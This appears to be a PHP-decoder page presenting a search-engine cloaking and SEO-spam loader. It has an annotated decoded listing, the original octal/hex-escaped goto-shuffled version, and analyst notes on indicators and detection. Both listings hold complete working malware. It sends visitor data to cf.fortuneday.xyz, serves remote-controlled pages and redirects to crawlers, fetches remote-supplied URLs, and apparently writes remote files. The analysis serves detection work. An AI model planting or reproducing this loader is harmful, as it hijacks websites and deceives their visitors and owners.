PHP Decode
<?php goto eJsz7RDHed; AqlSVnHlVv: bgfsbDIHmA: WwlROSZwio: if (!(stripos($cntx, "\x6f\x6b..
Decoded Output
<?php
// ANALYST NOTES (decoded sample, code unchanged; only layout and comments added)
// -----------------------------------------------------------------------------
// What this is: a search-engine cloaking / SEO-spam loader. Statement blocks are
// shuffled and stitched together with goto labels, so textual order is NOT
// execution order. Execution order is:
//   eJsz7RDHed -> O2wFc2yWdM -> zahOakIdFk -> Pm47vykUGm -> (response dispatch)
// Requests that do not look like a crawler or a search-engine referral jump to
// oi1q3tIeXm -> faSPJA9VZZ and produce no output here, so the injected code stays
// invisible to ordinary visitors and to an owner browsing the site directly.
//
// Indicators visible in this listing:
//   - outbound host:   cf.fortuneday.xyz  (plain http://, path /index?)
//   - version string:  2.2.17, group id "1000"
//   - custom outbound request headers: Lang, Http-Proto, Http-Host, Http-Uri,
//     Dbgroup, Http-X-Forwarded-For, Token
//   - inbound request header read via $_SERVER["HTTP_XDOIM"]
//   - error_reporting(0) + ignore_user_abort(1) + set_time_limit(3600) preamble
// Detection ideas: egress logs for PHP workers contacting the host above; file
// scans for dense goto-label code combined with escaped string literals; compare
// pages fetched with a crawler User-Agent against pages fetched normally.
goto eJsz7RDHed;
AqlSVnHlVv:
bgfsbDIHmA:
WwlROSZwio:
// Health-check style reply: a remote body starting with "ok" is echoed back with
// the group id, remote host name and version appended.
if (!(stripos($cntx, "ok") === 0)) {
    goto kna4ftyXSu;
}
exit($cntx . $db . $gov . $ixv);
kna4ftyXSu:
goto ZCUCuvMt6W;
S2Eqw8ugo2:
// Redirect branch: the remote body is used verbatim as the Location target, so
// where the visitor is sent is decided entirely by the remote server.
@header("Location: " . $cntx);
exit;
Qey1KIm2YV:
// Body starts with "http" but has no "?main_page=": check for the "[,]" separator.
if (!strstr($cntx, "[,]")) {
    goto S66KNU1gNP;
}
$segs = explode("[,]", $cntx);
goto fSuZ4sJhf1;
Q1YSkncu0m:
DsYq_WavgK:
oi1q3tIeXm:
// Exit from the top-level flow without output (non-matching request, or empty
// remote response): control jumps to the function declaration at the end.
goto faSPJA9VZZ;
zQosCyyt2W:
S66KNU1gNP:
iEuvh4l16e:
// File-drop branch. The "." before (txt|php) is unescaped, so it matches any
// character; the pattern is looser than a real extension check.
if (!@preg_match("#^[^.]*.(txt|php)#i", $cntx)) {
    goto WwlROSZwio;
}
$values = explode("[,]", $cntx);
// NOTE(review): todk() is not defined anywhere in this listing. If nothing else
// loaded in the same request defines it, this call is a fatal error. The two
// remote-supplied arguments and the file_exists() check that follows suggest it
// writes remote content to a remote-chosen path - treat as a file-write
// capability until the sibling code is examined; TODO confirm.
todk($values[0], $values[1]);
goto ZNL_nI2DdA;
zahOakIdFk:
// Second half of request fingerprinting. HTTP_HOST and the headers below are
// client-controlled and are forwarded to the remote host unmodified.
$host = $_SERVER["HTTP_HOST"];
$lang = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : '';
// Value of the inbound "Xdoim" request header, relayed below as "Token".
$token = isset($_SERVER["HTTP_XDOIM"]) ? $_SERVER["HTTP_XDOIM"] : '';
// Scheme detection, also honouring proxy / front-end TLS headers.
$proto = !empty($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off"
    || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https"
    || !empty($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off"
    ? "https" : "http";
// Headers attached to the outbound request; they mirror the visitor's request
// so the remote side can tailor its response per crawler, language and URL.
$header = array(
    "Lang: " . $lang,
    "User-Agent: " . $ua,
    "Referer: " . $ur,
    "Http-Proto: " . $proto,
    "Http-Host: " . $host,
    "Http-Uri: " . $uri,
    "Dbgroup: " . $gov,
    "Http-X-Forwarded-For: " . $ip,
    "Token: " . $token
);
goto Pm47vykUGm;
ZCUCuvMt6W:
// Mirror remote failures locally: any 4xx becomes a bare 404, any 5xx a bare 500.
if (!($code >= 400 && $code < 500)) {
    goto fAxIs24q3X;
}
@header("HTTP/1.1 404 Not Found");
exit;
fAxIs24q3X:
if (!($code >= 500)) {
    goto AoZqDojj53;
}
goto VCOsTCgpfB;
eJsz7RDHed:
// ENTRY POINT. Errors are silenced and the script is allowed to run for up to an
// hour even if the client disconnects.
error_reporting(0);
@set_time_limit(3600);
@ignore_user_abort(1);
$ixv = "2.2.17";
// Remote host contacted by this sample (network indicator).
$gov = "cf.fortuneday.xyz";
goto O2wFc2yWdM;
COb2dcVyBu:
// Remote body starting with "<?xml" is served as text/xml.
if (!(stripos($cntx, "<?xml") === 0)) {
    goto eUTH0InsdK;
}
@header("Content-type: text/xml");
exit($cntx);
eUTH0InsdK:
// Remote body starting with "User-ag" is served as plain text.
if (!(stripos($cntx, "User-ag") === 0)) {
    goto DsaTkjv2CD;
}
goto el04lsBrqu;
VCOsTCgpfB:
@header("HTTP/1.1 500 Internal Server Error");
exit;
AoZqDojj53:
// Fallback: any other non-empty remote body is emitted as-is.
if (!($cntx != '')) {
    goto DsYq_WavgK;
}
exit($cntx);
goto Q1YSkncu0m;
O2wFc2yWdM:
// First half of request fingerprinting: visitor address, referrer, user agent
// and requested URI.
$db = "1000";
$ip = $_SERVER["REMOTE_ADDR"];
$ur = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$ua = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
$uri = $_SERVER["REQUEST_URI"];
goto zahOakIdFk;
fSuZ4sJhf1:
// Fetch-list branch: the part before "[,]" is a comma-separated URL list and the
// part after it is used as the User-Agent. Every URL comes from the remote
// response, so this web server issues outbound requests to hosts it was told to
// contact; expect unexplained egress from the PHP worker when this path runs.
$lines = explode(",", $segs[0]);
$result = '';
foreach ($lines as $url) {
    list($respbody, $code) = urlx($url, null, null, $segs[1]);
    $result .= $url . $respbody;
    AXe5h0TMzs:
}
LkuX5CVwAy:
exit($result);
goto zQosCyyt2W;
Pm47vykUGm:
// Values are interpolated without URL-encoding.
$postdata = "proto={$proto}&shost={$host}&ip={$ip}&dbgroup={$db}&uri={$uri}";
// CLOAKING GATE. The remote host is contacted only when the URI is not
// /favicon.ico AND either (a) the User-Agent contains google, yahoo or bing, or
// (b) the Referer names one of the listed search domains and the URI contains
// "/" or "?" followed by one alphanumeric character and digits. Both signals are
// client-supplied, which is what makes the crawler-vs-normal comparison in the
// header notes a workable detection test.
if (!($uri !== "/favicon.ico" && (@preg_match("#google|yahoo|bing#i", $ua) || @preg_match("#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i", $ur) && @preg_match("#[/\?]([a-z0-9]{1})(\d+)#i", $uri)))) {
    goto oi1q3tIeXm;
}
// The same parameter string is sent both in the query string and as the POST
// body, over unencrypted http.
list($cntx, $code, $ctype) = urlx("http://" . $gov . "/index?" . $postdata, $header, $postdata);
// Response dispatch begins here; the first matching branch calls exit, replacing
// the site's own page with remote-controlled content.
// Note "> 0": a Content-Type that begins with "gzip" at offset 0 does not match.
if (!(stripos($ctype, "gzip") > 0)) {
    goto tXOqxhXF1v;
}
@header("Content-type: application/x-gzip");
goto vmWYc7Z2Zb;
vmWYc7Z2Zb:
exit($cntx);
tXOqxhXF1v:
// Remote HTML is emitted verbatim in place of the legitimate page.
if (!(stripos($cntx, "<!doct") === 0 || stripos($cntx, "<html") === 0)) {
    goto rtxe2mhRvB;
}
exit($cntx);
rtxe2mhRvB:
goto COb2dcVyBu;
ZNL_nI2DdA:
// Status reply after the todk() call: reports whether the target path exists.
if (file_exists($values[0])) {
    goto g22zXBKWTH;
}
exit("no false");
goto bgfsbDIHmA;
g22zXBKWTH:
exit("end ok");
goto AqlSVnHlVv;
el04lsBrqu:
@header("Content-type: text/plain;charset=utf-8");
exit($cntx);
DsaTkjv2CD:
// Remote body starting with "http": redirect when it contains "?main_page=",
// otherwise treat it as a fetch list (Qey1KIm2YV).
if (!(stripos($cntx, "http") === 0)) {
    goto iEuvh4l16e;
}
if (!stripos($cntx, "?main_page=")) {
    goto Qey1KIm2YV;
}
goto S2Eqw8ugo2;
faSPJA9VZZ:
// urlx(): cURL wrapper used for every outbound request in this sample.
//   $url      target URL
//   $header   optional array of request header lines
//   $postdata optional body; a non-empty value switches the request to POST
//   $ua       optional User-Agent override
// Returns array(body, HTTP status code, Content-Type), or nothing when the cURL
// extension is unavailable. Redirects are followed and only a 30 s connect
// timeout is set (no overall transfer timeout). Exceptions are swallowed.
function urlx($url, $header = null, $postdata = null, $ua = null)
{
    if (!function_exists("curl_init")) {
        return;
    }
    try {
        goto D_qmYGcHjD;
        KnceqyU7MM:
        curl_close($ch);
        goto KfRv4HLZkV;
        PmTfuSD3C2:
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
        $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua);
        if (!($postdata !== null && $postdata !== '')) {
            goto mS_mJd02b5;
        }
        curl_setopt($ch, CURLOPT_POST, 1);
        goto WiMZNfP3dW;
        WiMZNfP3dW:
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
        mS_mJd02b5:
        $body = curl_exec($ch);
        $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
        goto KnceqyU7MM;
        D_qmYGcHjD:
        // Execution inside the try block starts here.
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_ENCODING, "gzip,deflate");
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
        goto PmTfuSD3C2;
        KfRv4HLZkV:
    } catch (Exception $e) {
    }
    return array($body, $code, $ctype);
}
?>
Original Code
<?php
// ANALYST NOTES (obfuscated sample as submitted; code below is unchanged)
// Obfuscation used here:
//   1. Every string literal is a double-quoted string written as a mix of octal
//      ("\114") and hex ("\x6f") escapes, so plain-text searches for header names
//      or the remote host find nothing. PHP resolves the escapes when it parses
//      the literal; there is no eval() or decoder function to hook.
//   2. Statement blocks are shuffled and joined with goto and random-looking
//      labels, so textual order is not execution order. Execution starts at the
//      label eJsz7RDHed.
// The literal assigned to $gov decodes to "cf.fortuneday.xyz" and the one
// assigned to $ixv to "2.2.17"; the "Decoded Output" listing on this page shows
// all literals in clear text.
// Detection: matching on the literal bytes of this file is brittle because the
// labels and the escape mix can change from copy to copy (presumably generated
// per sample - confirm against other copies). More durable signals are the
// structure (very high ratio of escaped characters inside string literals plus
// many goto labels in one PHP file), the error_reporting(0) / set_time_limit /
// ignore_user_abort preamble, and outbound HTTP from the web server to the
// decoded host.
goto eJsz7RDHed; AqlSVnHlVv: bgfsbDIHmA: WwlROSZwio: if (!(stripos($cntx, "\x6f\x6b") === 0)) { goto kna4ftyXSu; } exit($cntx . $db . $gov . $ixv); kna4ftyXSu: goto ZCUCuvMt6W; S2Eqw8ugo2: @header("\114\x6f\x63\x61\164\151\x6f\156\72\40" . $cntx); exit; Qey1KIm2YV: if (!strstr($cntx, "\133\x2c\135")) { goto S66KNU1gNP; } $segs = explode("\x5b\54\x5d", $cntx); goto fSuZ4sJhf1; Q1YSkncu0m: DsYq_WavgK: oi1q3tIeXm: goto faSPJA9VZZ; zQosCyyt2W: S66KNU1gNP: iEuvh4l16e: if (!@preg_match("\43\x5e\133\x5e\56\x5d\x2a\56\50\x74\x78\x74\174\160\x68\160\x29\43\151", $cntx)) { goto WwlROSZwio; } $values = explode("\133\x2c\135", $cntx); todk($values[0], $values[1]); goto ZNL_nI2DdA; zahOakIdFk: $host = $_SERVER["\110\124\124\120\137\110\117\x53\124"]; $lang = isset($_SERVER["\x48\124\124\x50\137\101\103\103\105\120\x54\x5f\x4c\x41\116\x47\x55\101\x47\105"]) ? $_SERVER["\110\x54\x54\120\x5f\101\103\103\105\120\124\137\114\101\x4e\x47\125\x41\x47\105"] : ''; $token = isset($_SERVER["\x48\124\x54\x50\x5f\130\104\117\x49\x4d"]) ? $_SERVER["\110\x54\x54\120\x5f\x58\x44\117\x49\115"] : ''; $proto = !empty($_SERVER["\x48\x54\x54\x50\123"]) && strtolower($_SERVER["\x48\124\124\120\x53"]) !== "\x6f\146\146" || isset($_SERVER["\x48\124\x54\120\x5f\x58\137\106\117\x52\x57\x41\122\x44\x45\x44\x5f\x50\122\117\124\117"]) && $_SERVER["\x48\x54\124\120\137\x58\137\106\117\122\127\x41\x52\104\x45\x44\x5f\120\122\x4f\124\117"] === "\150\x74\x74\160\163" || !empty($_SERVER["\x48\x54\124\120\x5f\x46\x52\x4f\x4e\124\x5f\105\116\104\x5f\x48\x54\124\x50\x53"]) && strtolower($_SERVER["\110\124\x54\x50\137\106\x52\117\x4e\x54\137\x45\116\104\137\x48\124\124\x50\123"]) !== "\x6f\x66\146" ? "\150\164\x74\160\x73" : "\x68\x74\x74\160"; $header = array("\x4c\141\156\147\72\x20" . $lang, "\125\x73\145\162\55\101\x67\145\156\x74\72\x20" . $ua, "\x52\145\146\145\x72\145\162\72\x20" . $ur, "\110\x74\x74\x70\55\120\162\x6f\164\x6f\72\x20" . $proto, "\x48\x74\164\160\55\110\x6f\x73\x74\72\40" . 
$host, "\x48\x74\164\x70\x2d\125\x72\x69\x3a\40" . $uri, "\104\142\147\162\x6f\x75\160\72\x20" . $gov, "\110\164\164\160\x2d\x58\x2d\106\157\162\x77\x61\x72\x64\145\x64\55\106\157\x72\72\40" . $ip, "\x54\157\x6b\x65\156\72\40" . $token); goto Pm47vykUGm; ZCUCuvMt6W: if (!($code >= 400 && $code < 500)) { goto fAxIs24q3X; } @header("\110\x54\124\x50\57\x31\x2e\x31\40\x34\x30\64\40\x4e\x6f\164\x20\106\157\x75\156\144"); exit; fAxIs24q3X: if (!($code >= 500)) { goto AoZqDojj53; } goto VCOsTCgpfB; eJsz7RDHed: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "\x32\56\x32\56\61\67"; $gov = "\x63\146\x2e\146\x6f\162\x74\165\x6e\145\x64\141\x79\56\x78\171\x7a"; goto O2wFc2yWdM; COb2dcVyBu: if (!(stripos($cntx, "\74\77\170\x6d\x6c") === 0)) { goto eUTH0InsdK; } @header("\103\157\x6e\164\x65\156\164\x2d\164\x79\160\x65\72\x20\164\145\170\164\57\x78\x6d\x6c"); exit($cntx); eUTH0InsdK: if (!(stripos($cntx, "\125\x73\145\162\x2d\x61\x67") === 0)) { goto DsaTkjv2CD; } goto el04lsBrqu; VCOsTCgpfB: @header("\110\124\x54\x50\x2f\x31\x2e\61\x20\x35\60\x30\x20\111\156\164\145\x72\x6e\x61\x6c\x20\x53\145\x72\166\145\x72\x20\105\162\x72\157\x72"); exit; AoZqDojj53: if (!($cntx != '')) { goto DsYq_WavgK; } exit($cntx); goto Q1YSkncu0m; O2wFc2yWdM: $db = "1000"; $ip = $_SERVER["\122\105\x4d\117\124\x45\137\x41\x44\x44\122"]; $ur = isset($_SERVER["\x48\x54\x54\120\x5f\x52\x45\x46\x45\122\x45\x52"]) ? $_SERVER["\x48\124\124\120\137\122\105\x46\x45\x52\x45\122"] : ''; $ua = isset($_SERVER["\110\x54\x54\x50\x5f\125\123\105\122\x5f\x41\107\105\x4e\124"]) ? $_SERVER["\110\x54\124\120\x5f\125\123\105\122\x5f\x41\x47\x45\116\124"] : ''; $uri = $_SERVER["\122\x45\121\x55\x45\x53\124\x5f\x55\122\111"]; goto zahOakIdFk; fSuZ4sJhf1: $lines = explode("\54", $segs[0]); $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . 
$respbody; AXe5h0TMzs: } LkuX5CVwAy: exit($result); goto zQosCyyt2W; Pm47vykUGm: $postdata = "\160\x72\157\x74\x6f\75{$proto}\46\x73\150\157\x73\x74\x3d{$host}\46\151\x70\x3d{$ip}\x26\144\142\147\x72\x6f\165\160\x3d{$db}\46\165\162\x69\75{$uri}"; if (!($uri !== "\x2f\x66\141\x76\x69\x63\157\x6e\56\151\143\157" && (@preg_match("\x23\147\157\x6f\x67\154\x65\x7c\171\x61\150\157\157\174\142\151\156\x67\43\151", $ua) || @preg_match("\x23\x67\x6f\x6f\147\x6c\x65\56\x63\157\x2e\x6a\160\x7c\x67\157\x6f\x67\154\x65\56\143\157\x6d\x7c\x79\x61\150\157\157\x2e\x63\x6f\155\x7c\171\141\150\157\x6f\56\x63\157\x2e\152\160\174\x62\151\156\147\x2e\143\x6f\x6d\43\x69", $ur) && @preg_match("\x23\133\x2f\134\77\135\x28\x5b\141\x2d\x7a\x30\55\71\x5d\173\61\175\51\x28\134\x64\x2b\51\43\151", $uri)))) { goto oi1q3tIeXm; } list($cntx, $code, $ctype) = urlx("\150\x74\164\160\x3a\x2f\x2f" . $gov . "\x2f\151\x6e\x64\x65\x78\x3f" . $postdata, $header, $postdata); if (!(stripos($ctype, "\147\x7a\151\x70") > 0)) { goto tXOqxhXF1v; } @header("\x43\157\x6e\164\145\156\164\x2d\164\x79\160\145\x3a\x20\x61\x70\x70\154\x69\143\141\x74\151\157\x6e\x2f\170\x2d\x67\x7a\x69\160"); goto vmWYc7Z2Zb; vmWYc7Z2Zb: exit($cntx); tXOqxhXF1v: if (!(stripos($cntx, "\x3c\41\x64\157\x63\164") === 0 || stripos($cntx, "\x3c\x68\164\155\x6c") === 0)) { goto rtxe2mhRvB; } exit($cntx); rtxe2mhRvB: goto COb2dcVyBu; ZNL_nI2DdA: if (file_exists($values[0])) { goto g22zXBKWTH; } exit("\x6e\x6f\x20\x66\x61\154\163\145"); goto bgfsbDIHmA; g22zXBKWTH: exit("\x65\156\x64\x20\x6f\153"); goto AqlSVnHlVv; el04lsBrqu: @header("\103\x6f\x6e\x74\145\x6e\x74\x2d\164\171\160\145\72\x20\x74\x65\x78\164\x2f\160\154\x61\151\156\x3b\x63\x68\141\162\163\x65\164\x3d\165\164\146\55\x38"); exit($cntx); DsaTkjv2CD: if (!(stripos($cntx, "\150\164\x74\160") === 0)) { goto iEuvh4l16e; } if (!stripos($cntx, "\x3f\155\x61\x69\156\137\x70\x61\147\x65\75")) { goto Qey1KIm2YV; } goto S2Eqw8ugo2; faSPJA9VZZ: function urlx($url, $header = null, $postdata = 
null, $ua = null) { if (!function_exists("\143\165\x72\x6c\x5f\x69\156\151\x74")) { return; } try { goto D_qmYGcHjD; KnceqyU7MM: curl_close($ch); goto KfRv4HLZkV; PmTfuSD3C2: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); if (!($postdata !== null && $postdata !== '')) { goto mS_mJd02b5; } curl_setopt($ch, CURLOPT_POST, 1); goto WiMZNfP3dW; WiMZNfP3dW: curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); mS_mJd02b5: $body = curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); goto KnceqyU7MM; D_qmYGcHjD: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_ENCODING, "\x67\x7a\x69\x70\54\x64\x65\146\x6c\x61\164\145"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); goto PmTfuSD3C2; KfRv4HLZkV: } catch (Exception $e) { } return array($body, $code, $ctype); } ?>
Function Calls
None |
Stats
MD5 | 9e923a6a9fd22773dbf36584108718e6 |
Eval Count | 0 |
Decode Time | 74 ms |